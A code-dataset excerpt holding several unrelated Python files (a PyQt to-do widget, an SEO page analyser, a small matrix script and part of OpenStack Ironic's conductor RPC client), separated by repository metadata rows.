from PyQt5 import QtGui, QtWidgets, QtCore
from PyQt5.QtCore import QSize
from PyQt5.QtWidgets import QListWidgetItem, QWidget, QLabel, QLineEdit, QPushButton, QHBoxLayout, QApplication, \
QListWidget, QSpacerItem, QSizePolicy
from ui_macro import *
class TodoQListWidgetItem(QListWidgetItem):
def __init__(self, content, num):
super().__init__()
self.widget = QWidget()
# decoration
self.label_arrow = QLabel()
self.label_arrow.setText("")
self.label_arrow.setPixmap(QtGui.QPixmap("../res/arrow.png").scaled(24, 24))
# display planning content
self.label_content = QLabel()
self.label_content.setText(content)
        # display planning num
self.lineEdit_num = QLineEdit()
# self.lineEdit_num.setAlignment(QtCore.Qt.AlignCenter)
str_num = num.split(".")[0]
width = self.lineEdit_num.fontMetrics().width(str_num)
self.lineEdit_num.setMaximumWidth(width*3)
self.lineEdit_num.setText(str_num)
# button
self.pushButton_done = QPushButton()
self.pushButton_done.setText("")
icon_done = QtGui.QIcon()
icon_done.addPixmap(QtGui.QPixmap("../res/done.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_done.setIcon(icon_done)
self.pushButton_delete = QPushButton()
self.pushButton_delete.setText("")
icon_delete = QtGui.QIcon()
icon_delete.addPixmap(QtGui.QPixmap("../res/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_delete.setIcon(icon_delete)
self.hbox = QHBoxLayout()
self.hbox.addWidget(self.label_arrow)
self.hbox.addWidget(self.label_content)
self.hbox.addWidget(self.lineEdit_num)
self.hbox.addStretch(1)
self.hbox.addWidget(self.pushButton_done)
self.hbox.addWidget(self.pushButton_delete)
        # Set the layout of the widget
self.widget.setLayout(self.hbox)
# self.widget.setSizePolicy(QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding))
        # Set the sizeHint of the custom QListWidgetItem, otherwise it will not display properly
self.setSizeHint(self.widget.sizeHint())
# --- custom theme ---
        # since I haven't found a way to change the custom QListWidgetItem style in the stylesheet
widget_qss = """
margin-left: 14px; margin-right: 14px; margin-top: 7px; margin-bottom: 7px;
background-color: white;
border-radius: 10px;
"""
self.widget.setStyleSheet(widget_qss)
button_qss = """
margin: 4px;
padding: 8px;
"""
self.pushButton_delete.setStyleSheet(button_qss)
self.pushButton_done.setStyleSheet(button_qss)
label_qss = """
font-size: 30px;
font: bold;
"""
self.label_content.setStyleSheet(label_qss)
lineEdit_qss = """
margin: 0px;
border-radius: 0px;
"""
self.lineEdit_num.setStyleSheet(lineEdit_qss)
| 40.833333 | 114 | 0.616327 |
794635f2bdf0efaf87e79d5a39d22b158b83ce97 | 14,555 | py | Python | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | seoanalyzer_two/page.py | pythonscriptkiddie/python-seo-analyzer | e476cdd3ef5332657375b76578f19be315a2440f | [
"BSD-3-Clause"
] | null | null | null | import hashlib
import json
import os
import re
from bs4 import BeautifulSoup
from collections import Counter
from string import punctuation
from urllib.parse import urlsplit
from urllib3.exceptions import HTTPError
from seoanalyzer.http import http
from seoanalyzer.stemmer import stem
# This list of English stop words is taken from the "Glasgow Information
# Retrieval Group". The original list can be found at
# http://ir.dcs.gla.ac.uk/resources/linguistic_utils/stop_words
ENGLISH_STOP_WORDS = frozenset([
"a", "about", "above", "across", "after", "afterwards", "again", "against",
"all", "almost", "alone", "along", "already", "also", "although", "always",
"am", "among", "amongst", "amoungst", "amount", "an", "and", "another",
"any", "anyhow", "anyone", "anything", "anyway", "anywhere", "are",
"around", "as", "at", "back", "be", "became", "because", "become",
"becomes", "becoming", "been", "before", "beforehand", "behind", "being",
"below", "beside", "besides", "between", "beyond", "bill", "both",
"bottom", "but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do", "done",
"down", "due", "during", "each", "eg", "eight", "either", "eleven", "else",
"elsewhere", "empty", "enough", "etc", "even", "ever", "every", "everyone",
"everything", "everywhere", "except", "few", "fifteen", "fify", "fill",
"find", "fire", "first", "five", "for", "former", "formerly", "forty",
"found", "four", "from", "front", "full", "further", "get", "give", "go",
"had", "has", "hasnt", "have", "he", "hence", "her", "here", "hereafter",
"hereby", "herein", "hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "i", "ie", "if", "in", "inc", "indeed",
"interest", "into", "is", "it", "its", "itself", "keep", "last", "latter",
"latterly", "least", "less", "ltd", "made", "many", "may", "me",
"meanwhile", "might", "mill", "mine", "more", "moreover", "most", "mostly",
"move", "much", "must", "my", "myself", "name", "namely", "neither",
"never", "nevertheless", "next", "nine", "no", "nobody", "none", "noone",
"nor", "not", "nothing", "now", "nowhere", "of", "off", "often", "on",
"once", "one", "only", "onto", "or", "other", "others", "otherwise", "our",
"ours", "ourselves", "out", "over", "own", "part", "per", "perhaps",
"please", "put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should", "show", "side",
"since", "sincere", "six", "sixty", "so", "some", "somehow", "someone",
"something", "sometime", "sometimes", "somewhere", "still", "such",
"system", "take", "ten", "than", "that", "the", "their", "them",
"themselves", "then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they",
"third", "this", "those", "though", "three", "through", "throughout",
"thru", "thus", "to", "together", "too", "top", "toward", "towards",
"twelve", "twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever", "when",
"whence", "whenever", "where", "whereafter", "whereas", "whereby",
"wherein", "whereupon", "wherever", "whether", "which", "while", "whither",
"who", "whoever", "whole", "whom", "whose", "why", "will", "with",
"within", "without", "would", "yet", "you", "your", "yours", "yourself",
"yourselves"])
TOKEN_REGEX = re.compile(r'(?u)\b\w\w+\b')
IMAGE_EXTENSIONS = set(['.img', '.png', '.jpg', '.jpeg', '.gif', '.bmp', '.svg', '.webp', '.avif',])
class Page():
"""
Container for each page and the core analyzer.
"""
def __init__(self, url='', base_domain=''):
"""
Variables go here, *not* outside of __init__
"""
self.base_domain = urlsplit(base_domain)
self.parsed_url = urlsplit(url)
self.url = url
self.title = ''
self.description = ''
self.keywords = {}
self.warnings = []
self.translation = bytes.maketrans(punctuation.encode('utf-8'), str(' ' * len(punctuation)).encode('utf-8'))
self.links = []
self.total_word_count = 0
self.wordcount = Counter()
self.bigrams = Counter()
self.trigrams = Counter()
self.stem_to_word = {}
self.content_hash = None
def talk(self):
"""
Returns a dictionary that can be printed
"""
return {
'url': self.url,
'title': self.title,
'description': self.description,
'word_count': self.total_word_count,
'keywords': self.sort_freq_dist(self.keywords, limit=5),
'bigrams': self.bigrams,
'trigrams': self.trigrams,
'warnings': self.warnings,
'content_hash': self.content_hash
}
def populate(self, bs):
"""
Populates the instance variables from BeautifulSoup
"""
try:
self.title = bs.title.text
except AttributeError:
self.title = 'No Title'
descr = bs.findAll('meta', attrs={'name': 'description'})
if len(descr) > 0:
self.description = descr[0].get('content')
keywords = bs.findAll('meta', attrs={'name': 'keywords'})
if len(keywords) > 0:
self.warn(f'Keywords should be avoided as they are a spam indicator and no longer used by Search Engines: {keywords}')
def analyze(self, raw_html=None):
"""
Analyze the page and populate the warnings list
"""
if not raw_html:
valid_prefixes = []
# only allow http:// https:// and //
for s in ['http://', 'https://', '//',]:
valid_prefixes.append(self.url.startswith(s))
if True not in valid_prefixes:
self.warn(f'{self.url} does not appear to have a valid protocol.')
return
if self.url.startswith('//'):
self.url = f'{self.base_domain.scheme}:{self.url}'
if self.parsed_url.netloc != self.base_domain.netloc:
self.warn(f'{self.url} is not part of {self.base_domain.netloc}.')
return
try:
page = http.get(self.url)
except HTTPError as e:
self.warn(f'Returned {e}')
return
encoding = 'ascii'
if 'content-type' in page.headers:
encoding = page.headers['content-type'].split('charset=')[-1]
if encoding.lower() not in ('text/html', 'text/plain', 'utf-8'):
# there is no unicode function in Python3
# try:
# raw_html = unicode(page.read(), encoding)
# except:
self.warn(f'Can not read {encoding}')
return
else:
raw_html = page.data.decode('utf-8')
self.content_hash = hashlib.sha1(raw_html.encode('utf-8')).hexdigest()
# remove comments, they screw with BeautifulSoup
clean_html = re.sub(r'<!--.*?-->', r'', raw_html, flags=re.DOTALL)
soup_lower = BeautifulSoup(clean_html.lower(), 'html.parser') #.encode('utf-8')
soup_unmodified = BeautifulSoup(clean_html, 'html.parser') #.encode('utf-8')
texts = soup_lower.findAll(text=True)
visible_text = [w for w in filter(self.visible_tags, texts)]
self.process_text(visible_text)
self.populate(soup_lower)
self.analyze_title()
self.analyze_description()
self.analyze_og(soup_lower)
self.analyze_a_tags(soup_unmodified)
self.analyze_img_tags(soup_lower)
self.analyze_h1_tags(soup_lower)
return True
def word_list_freq_dist(self, wordlist):
freq = [wordlist.count(w) for w in wordlist]
return dict(zip(wordlist, freq))
def sort_freq_dist(self, freqdist, limit=1):
aux = [(freqdist[key], self.stem_to_word[key]) for key in freqdist if freqdist[key] >= limit]
aux.sort()
aux.reverse()
return aux
def raw_tokenize(self, rawtext):
return TOKEN_REGEX.findall(rawtext.lower())
def tokenize(self, rawtext):
return [word for word in TOKEN_REGEX.findall(rawtext.lower()) if word not in ENGLISH_STOP_WORDS]
def getngrams(self, D, n=2):
return zip(*[D[i:] for i in range(n)])
def process_text(self, vt):
page_text = ''
for element in vt:
if element.strip():
page_text += element.strip().lower() + u' '
tokens = self.tokenize(page_text)
raw_tokens = self.raw_tokenize(page_text)
self.total_word_count = len(raw_tokens)
bigrams = self.getngrams(raw_tokens, 2)
for ng in bigrams:
vt = ' '.join(ng)
self.bigrams[vt] += 1
trigrams = self.getngrams(raw_tokens, 3)
for ng in trigrams:
vt = ' '.join(ng)
self.trigrams[vt] += 1
freq_dist = self.word_list_freq_dist(tokens)
for word in freq_dist:
root = stem(word)
cnt = freq_dist[word]
if root not in self.stem_to_word:
self.stem_to_word[root] = word
if root in self.wordcount:
self.wordcount[root] += cnt
else:
self.wordcount[root] = cnt
if root in self.keywords:
self.keywords[root] += cnt
else:
self.keywords[root] = cnt
def analyze_og(self, bs):
"""
Validate open graph tags
"""
og_title = bs.findAll('meta', attrs={'property': 'og:title'})
og_description = bs.findAll('meta', attrs={'property': 'og:description'})
og_image = bs.findAll('meta', attrs={'property': 'og:image'})
if len(og_title) == 0:
self.warn(u'Missing og:title')
if len(og_description) == 0:
self.warn(u'Missing og:description')
if len(og_image) == 0:
self.warn(u'Missing og:image')
def analyze_title(self):
"""
Validate the title
"""
        # getting lazy, create a local variable to save having to
# type self.x a billion times
t = self.title
# calculate the length of the title once
length = len(t)
if length == 0:
self.warn(u'Missing title tag')
return
elif length < 10:
            self.warn(u'Title tag length ({0} characters) is too short (less than 10 characters): {1}'.format(length, t))
elif length > 70:
self.warn(u'Title tag is too long (more than 70 characters): {0}'.format(t))
def analyze_description(self):
"""
Validate the description
"""
        # getting lazy, create a local variable to save having to
# type self.x a billion times
d = self.description
# calculate the length of the description once
length = len(d)
if length == 0:
self.warn(u'Missing description')
return
elif length < 96:
self.warn(u'Description length ({0} characters) is too short (less than 96 characters): {1}'.format(length, d))
elif length < 120:
self.warn(u'Description length ({0} characters) may be too short (between 96 and 120 characters): {1}'.format(length, d))
elif length > 140:
self.warn(u'Description length ({0} characters) may be too long (between 120 and 140 characters): {1}'.format(length, d))
elif length > 255:
self.warn(u'Description length ({0} characters) is too long (more than 255 characters): {1}'.format(length, d))
def visible_tags(self, element):
if element.parent.name in ['style', 'script', '[document]']:
return False
return True
def analyze_img_tags(self, bs):
"""
Verifies that each img has an alt and title
"""
images = bs.find_all('img')
for image in images:
            # membership must be checked on the tag's attrs, not the tag itself
            src = ''
            if 'src' in image.attrs:
                src = image['src']
            elif 'data-src' in image.attrs:
                src = image['data-src']
            else:
                src = image
if len(image.get('alt', '')) == 0:
self.warn('Image missing alt tag: {0}'.format(src))
def analyze_h1_tags(self, bs):
"""
Make sure each page has at least one H1 tag
"""
htags = bs.find_all('h1')
if len(htags) == 0:
self.warn('Each page should have at least one h1 tag')
def analyze_a_tags(self, bs):
"""
Add any new links (that we didn't find in the sitemap)
"""
anchors = bs.find_all('a', href=True)
for tag in anchors:
tag_href = tag['href']
tag_text = tag.text.lower().strip()
if len(tag.get('title', '')) == 0:
self.warn('Anchor missing title tag: {0}'.format(tag_href))
if tag_text in ['click here', 'page', 'article']:
self.warn('Anchor text contains generic text: {0}'.format(tag_text))
if self.base_domain.netloc not in tag_href and ':' in tag_href:
continue
modified_url = self.rel_to_abs_url(tag_href)
url_filename, url_file_extension = os.path.splitext(modified_url)
# ignore links to images
if url_file_extension in IMAGE_EXTENSIONS:
continue
# remove hash links to all urls
if '#' in modified_url:
modified_url = modified_url[:modified_url.rindex('#')]
self.links.append(modified_url)
def rel_to_abs_url(self, link):
if ':' in link:
return link
relative_path = link
domain = self.base_domain.netloc
if domain[-1] == '/':
domain = domain[:-1]
if len(relative_path) > 0 and relative_path[0] == '?':
if '?' in self.url:
return f'{self.url[:self.url.index("?")]}{relative_path}'
return f'{self.url}{relative_path}'
if len(relative_path) > 0 and relative_path[0] != '/':
relative_path = f'/{relative_path}'
return f'{self.base_domain.scheme}://{domain}{relative_path}'
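    # Worked examples (illustrative; assumes base_domain 'https://example.com'
    # and self.url 'https://example.com/blog?page=1'):
    #   rel_to_abs_url('/about')       -> 'https://example.com/about'
    #   rel_to_abs_url('?page=2')      -> 'https://example.com/blog?page=2'
    #   rel_to_abs_url('mailto:a@b.c') -> 'mailto:a@b.c' (returned unchanged)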
def warn(self, warning):
self.warnings.append(warning)
| 35.67402 | 133 | 0.5528 |
7946362425e412552236a68c8b31bc939c7107a1 | 1,111 | py | Python | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | _drafts/Linalg/transponering.py | Andremartiny/AndreMartiny.github.io | 54d6ebadb735bc865ee152a59d6ee964a0cf9c0c | [
"MIT"
] | null | null | null | import numpy as np
def transp(matrise):
return [[matrise[rad][kol] for rad in range(len(matrise))] for kol in range(len(matrise[0]))]
def matrisemult(mat1,mat2):
    # Should check whether the matrices can be multiplied at all
    mat1rad = len(mat1)  # number of rows in matrix 1
    mat2kol = len(mat2[0])  # number of columns in matrix 2
    if len(mat1[0]) != len(mat2):  # check that the column count of mat1 equals the row count of mat2
        return print("Incompatible matrices")
resultat = [[] for i in range(mat1rad)]
for k in range(mat1rad):
for j in range(mat2kol):
komponent = 0
for i in range(len(mat1[0])):
komponent += mat1[k][i]*mat2[i][j]
resultat[k].append(komponent)
return resultat
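# Quick sanity checks (illustrative, not part of the original script):
#   transp([[1, 2], [3, 4]]) == [[1, 3], [2, 4]]
#   matrisemult([[1, 2], [3, 4]], [[1, 0], [0, 1]]) == [[1, 2], [3, 4]]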
#matrise = [ [2,3,4,5,6], [6,7,8,9,10]
#]
#matrise2 = [[11,-12], [-21,22],[-31,32],[31,-32],[41,-42], [51,-52]
#]
matrise = [[1,2],[2,3],[4,5]]
matrise2 = [[0,0,1],[1,0,0],[0,0,1]]
matrise3 = [
[1,0,0,1],
[0,1,0,2],
]
print(np.matrix(matrise))
print("\n")
print(np.matrix((matrise3)))
print("\n")
print(np.matrix(matrisemult(matrise,matrise3))) | 25.837209 | 97 | 0.577858 |
794636c5f95c48bcef1ee289d825f60c761f942b | 33,407 | py | Python | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | ironic/conductor/rpcapi.py | pyrrrat/moved-ironic | 93331da82ef13490ccf08f8f9c370e81ca176a41 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Client side of the conductor RPC API.
"""
import random
import oslo_messaging as messaging
from ironic.common import exception
from ironic.common import hash_ring
from ironic.common.i18n import _
from ironic.common import rpc
from ironic.conductor import manager
from ironic.objects import base as objects_base
class ConductorAPI(object):
"""Client side of the conductor RPC API.
API version history:
| 1.0 - Initial version.
| Included get_node_power_status
| 1.1 - Added update_node and start_power_state_change.
| 1.2 - Added vendor_passthru.
| 1.3 - Rename start_power_state_change to change_node_power_state.
| 1.4 - Added do_node_deploy and do_node_tear_down.
| 1.5 - Added validate_driver_interfaces.
| 1.6 - change_node_power_state, do_node_deploy and do_node_tear_down
| accept node id instead of node object.
| 1.7 - Added topic parameter to RPC methods.
| 1.8 - Added change_node_maintenance_mode.
| 1.9 - Added destroy_node.
| 1.10 - Remove get_node_power_state
| 1.11 - Added get_console_information, set_console_mode.
| 1.12 - validate_vendor_action, do_vendor_action replaced by single
| vendor_passthru method.
| 1.13 - Added update_port.
| 1.14 - Added driver_vendor_passthru.
| 1.15 - Added rebuild parameter to do_node_deploy.
| 1.16 - Added get_driver_properties.
| 1.17 - Added set_boot_device, get_boot_device and
| get_supported_boot_devices.
| 1.18 - Remove change_node_maintenance_mode.
| 1.19 - Change return value of vendor_passthru and
| driver_vendor_passthru
| 1.20 - Added http_method parameter to vendor_passthru and
| driver_vendor_passthru
| 1.21 - Added get_node_vendor_passthru_methods and
| get_driver_vendor_passthru_methods
| 1.22 - Added configdrive parameter to do_node_deploy.
| 1.23 - Added do_provisioning_action
| 1.24 - Added inspect_hardware method
| 1.25 - Added destroy_port
| 1.26 - Added continue_node_clean
| 1.27 - Convert continue_node_clean to cast
| 1.28 - Change exceptions raised by destroy_node
| 1.29 - Change return value of vendor_passthru and
| driver_vendor_passthru to a dictionary
| 1.30 - Added set_target_raid_config and
| get_raid_logical_disk_properties
| 1.31 - Added Versioned Objects indirection API methods:
| object_class_action_versions, object_action and
| object_backport_versions
| 1.32 - Add do_node_clean
| 1.33 - Added update and destroy portgroup.
"""
# NOTE(rloo): This must be in sync with manager.ConductorManager's.
RPC_API_VERSION = '1.33'
def __init__(self, topic=None):
super(ConductorAPI, self).__init__()
self.topic = topic
if self.topic is None:
self.topic = manager.MANAGER_TOPIC
target = messaging.Target(topic=self.topic,
version='1.0')
serializer = objects_base.IronicObjectSerializer()
self.client = rpc.get_client(target,
version_cap=self.RPC_API_VERSION,
serializer=serializer)
# NOTE(deva): this is going to be buggy
self.ring_manager = hash_ring.HashRingManager()
def get_topic_for(self, node):
"""Get the RPC topic for the conductor service the node is mapped to.
:param node: a node object.
:returns: an RPC topic string.
:raises: NoValidHost
"""
self.ring_manager.reset()
try:
ring = self.ring_manager[node.driver]
dest = ring.get_hosts(node.uuid)
return self.topic + "." + dest[0]
except exception.DriverNotFound:
reason = (_('No conductor service registered which supports '
'driver %s.') % node.driver)
raise exception.NoValidHost(reason=reason)
def get_topic_for_driver(self, driver_name):
"""Get RPC topic name for a conductor supporting the given driver.
The topic is used to route messages to the conductor supporting
the specified driver. A conductor is selected at random from the
set of qualified conductors.
:param driver_name: the name of the driver to route to.
:returns: an RPC topic string.
:raises: DriverNotFound
"""
self.ring_manager.reset()
hash_ring = self.ring_manager[driver_name]
host = random.choice(list(hash_ring.hosts))
return self.topic + "." + host
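    # Typical call pattern (illustrative sketch; `rpcapi`, `context`, `node`
    # and `new_state` are assumed to exist in the caller):
    #   topic = rpcapi.get_topic_for(node)
    #   rpcapi.change_node_power_state(context, node.uuid, new_state,
    #                                  topic=topic)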
def update_node(self, context, node_obj, topic=None):
"""Synchronously, have a conductor update the node's information.
Update the node's information in the database and return a node object.
The conductor will lock the node while it validates the supplied
information. If driver_info is passed, it will be validated by
the core drivers. If instance_uuid is passed, it will be set or unset
only if the node is properly configured.
Note that power_state should not be passed via this method.
Use change_node_power_state for initiating driver actions.
:param context: request context.
:param node_obj: a changed (but not saved) node object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated node object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.1')
return cctxt.call(context, 'update_node', node_obj=node_obj)
def change_node_power_state(self, context, node_id, new_state, topic=None):
"""Change a node's power state.
Synchronously, acquire lock and start the conductor background task
to change power state of a node.
:param context: request context.
:param node_id: node id or uuid.
:param new_state: one of ironic.common.states power state values
:param topic: RPC topic. Defaults to self.topic.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.6')
return cctxt.call(context, 'change_node_power_state', node_id=node_id,
new_state=new_state)
def vendor_passthru(self, context, node_id, driver_method, http_method,
info, topic=None):
"""Receive requests for vendor-specific actions.
Synchronously validate driver specific info or get driver status,
and if successful invokes the vendor method. If the method mode
is async the conductor will start background worker to perform
vendor action.
:param context: request context.
:param node_id: node id or uuid.
:param driver_method: name of method for driver.
:param http_method: the HTTP method used for the request.
:param info: info for node driver.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue if supplied info is not valid.
:raises: MissingParameterValue if a required parameter is missing
:raises: UnsupportedDriverExtension if current driver does not have
vendor interface.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: NodeLocked if node is locked by another conductor.
:returns: A dictionary containing:
:return: The response of the invoked vendor method
:async: Boolean value. Whether the method was invoked
asynchronously (True) or synchronously (False). When invoked
asynchronously the response will be always None.
:attach: Boolean value. Whether to attach the response of
the invoked vendor method to the HTTP response object (True)
or return it in the response body (False).
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.20')
return cctxt.call(context, 'vendor_passthru', node_id=node_id,
driver_method=driver_method,
http_method=http_method,
info=info)
def driver_vendor_passthru(self, context, driver_name, driver_method,
http_method, info, topic=None):
"""Pass vendor-specific calls which don't specify a node to a driver.
Handles driver-level vendor passthru calls. These calls don't
require a node UUID and are executed on a random conductor with
the specified driver. If the method mode is async the conductor
will start background worker to perform vendor action.
:param context: request context.
:param driver_name: name of the driver on which to call the method.
:param driver_method: name of the vendor method, for use by the driver.
:param http_method: the HTTP method used for the request.
:param info: data to pass through to the driver.
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue for parameter errors.
:raises: MissingParameterValue if a required parameter is missing
:raises: UnsupportedDriverExtension if the driver doesn't have a vendor
interface, or if the vendor interface does not support the
specified driver_method.
:raises: DriverNotFound if the supplied driver is not loaded.
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:returns: A dictionary containing:
:return: The response of the invoked vendor method
:async: Boolean value. Whether the method was invoked
asynchronously (True) or synchronously (False). When invoked
asynchronously the response will be always None.
:attach: Boolean value. Whether to attach the response of
the invoked vendor method to the HTTP response object (True)
or return it in the response body (False).
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.20')
return cctxt.call(context, 'driver_vendor_passthru',
driver_name=driver_name,
driver_method=driver_method,
http_method=http_method,
info=info)
def get_node_vendor_passthru_methods(self, context, node_id, topic=None):
"""Retrieve information about vendor methods of the given node.
:param context: an admin context.
:param node_id: the id or uuid of a node.
:param topic: RPC topic. Defaults to self.topic.
:returns: dictionary of <method name>:<method metadata> entries.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.21')
return cctxt.call(context, 'get_node_vendor_passthru_methods',
node_id=node_id)
def get_driver_vendor_passthru_methods(self, context, driver_name,
topic=None):
"""Retrieve information about vendor methods of the given driver.
:param context: an admin context.
:param driver_name: name of the driver.
:param topic: RPC topic. Defaults to self.topic.
:returns: dictionary of <method name>:<method metadata> entries.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.21')
return cctxt.call(context, 'get_driver_vendor_passthru_methods',
driver_name=driver_name)
def do_node_deploy(self, context, node_id, rebuild, configdrive,
topic=None):
"""Signal to conductor service to perform a deployment.
:param context: request context.
:param node_id: node id or uuid.
:param rebuild: True if this is a rebuild request.
:param configdrive: A gzipped and base64 encoded configdrive.
:param topic: RPC topic. Defaults to self.topic.
:raises: InstanceDeployFailure
:raises: InvalidParameterValue if validation fails
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
The node must already be configured and in the appropriate
undeployed state before this method is called.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.22')
return cctxt.call(context, 'do_node_deploy', node_id=node_id,
rebuild=rebuild, configdrive=configdrive)
def do_node_tear_down(self, context, node_id, topic=None):
"""Signal to conductor service to tear down a deployment.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: InstanceDeployFailure
:raises: InvalidParameterValue if validation fails
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
The node must already be configured and in the appropriate
deployed state before this method is called.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.6')
return cctxt.call(context, 'do_node_tear_down', node_id=node_id)
def do_provisioning_action(self, context, node_id, action, topic=None):
"""Signal to conductor service to perform the given action on a node.
:param context: request context.
:param node_id: node id or uuid.
:param action: an action. One of ironic.common.states.VERBS
:param topic: RPC topic. Defaults to self.topic.
:raises: InvalidParameterValue
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
:raises: InvalidStateRequested if the requested action can not
be performed.
This encapsulates some provisioning actions in a single call.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.23')
return cctxt.call(context, 'do_provisioning_action',
node_id=node_id, action=action)
def continue_node_clean(self, context, node_id, topic=None):
"""Signal to conductor service to start the next cleaning action.
NOTE(JoshNang) this is an RPC cast, there will be no response or
exception raised by the conductor for this RPC.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.27')
return cctxt.cast(context, 'continue_node_clean',
node_id=node_id)
def validate_driver_interfaces(self, context, node_id, topic=None):
"""Validate the `core` and `standardized` interfaces for drivers.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:returns: a dictionary containing the results of each
interface validation.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.5')
return cctxt.call(context, 'validate_driver_interfaces',
node_id=node_id)
def destroy_node(self, context, node_id, topic=None):
"""Delete a node.
:param context: request context.
:param node_id: node id or uuid.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeAssociated if the node contains an instance
associated with it.
:raises: InvalidState if the node is in the wrong provision
state to perform deletion.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.9')
return cctxt.call(context, 'destroy_node', node_id=node_id)
def get_console_information(self, context, node_id, topic=None):
"""Get connection information about the console.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support console.
:raises: InvalidParameterValue when the wrong driver info is specified.
:raises: MissingParameterValue if a required parameter is missing
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.11')
return cctxt.call(context, 'get_console_information', node_id=node_id)
def set_console_mode(self, context, node_id, enabled, topic=None):
"""Enable/Disable the console.
:param context: request context.
:param node_id: node id or uuid.
:param topic: RPC topic. Defaults to self.topic.
:param enabled: Boolean value; whether the console is enabled or
disabled.
:raises: UnsupportedDriverExtension if the node's driver doesn't
support console.
:raises: InvalidParameterValue when the wrong driver info is specified.
:raises: MissingParameterValue if a required parameter is missing
:raises: NoFreeConductorWorker when there is no free worker to start
async task.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.11')
return cctxt.call(context, 'set_console_mode', node_id=node_id,
enabled=enabled)
def update_port(self, context, port_obj, topic=None):
"""Synchronously, have a conductor update the port's information.
Update the port's information in the database and return a port object.
The conductor will lock related node and trigger specific driver
actions if they are needed.
:param context: request context.
:param port_obj: a changed (but not saved) port object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated port object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.13')
return cctxt.call(context, 'update_port', port_obj=port_obj)
def update_portgroup(self, context, portgroup_obj, topic=None):
"""Synchronously, have a conductor update the portgroup's information.
Update the portgroup's information in the database and return a
portgroup object.
The conductor will lock related node and trigger specific driver
actions if they are needed.
:param context: request context.
:param portgroup_obj: a changed (but not saved) portgroup object.
:param topic: RPC topic. Defaults to self.topic.
:returns: updated portgroup object, including all fields.
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.33')
return cctxt.call(context, 'update_portgroup',
portgroup_obj=portgroup_obj)
def destroy_portgroup(self, context, portgroup, topic=None):
"""Delete a portgroup.
:param context: request context.
:param portgroup: portgroup object
:param topic: RPC topic. Defaults to self.topic.
:raises: NodeLocked if node is locked by another conductor.
:raises: NodeNotFound if the node associated with the portgroup does
not exist.
:raises: PortgroupNotEmpty if portgroup is not empty
"""
cctxt = self.client.prepare(topic=topic or self.topic, version='1.33')
return cctxt.call(context, 'destroy_portgroup', portgroup=portgroup)
def get_driver_properties(self, context, driver_name, topic=None):
"""Get the properties of the driver.
:param context: request context.
:param driver_name: name of the driver.
:param topic: RPC topic. Defaults to self.topic.
:returns: a dictionary with <property name>:<property description>
entries.
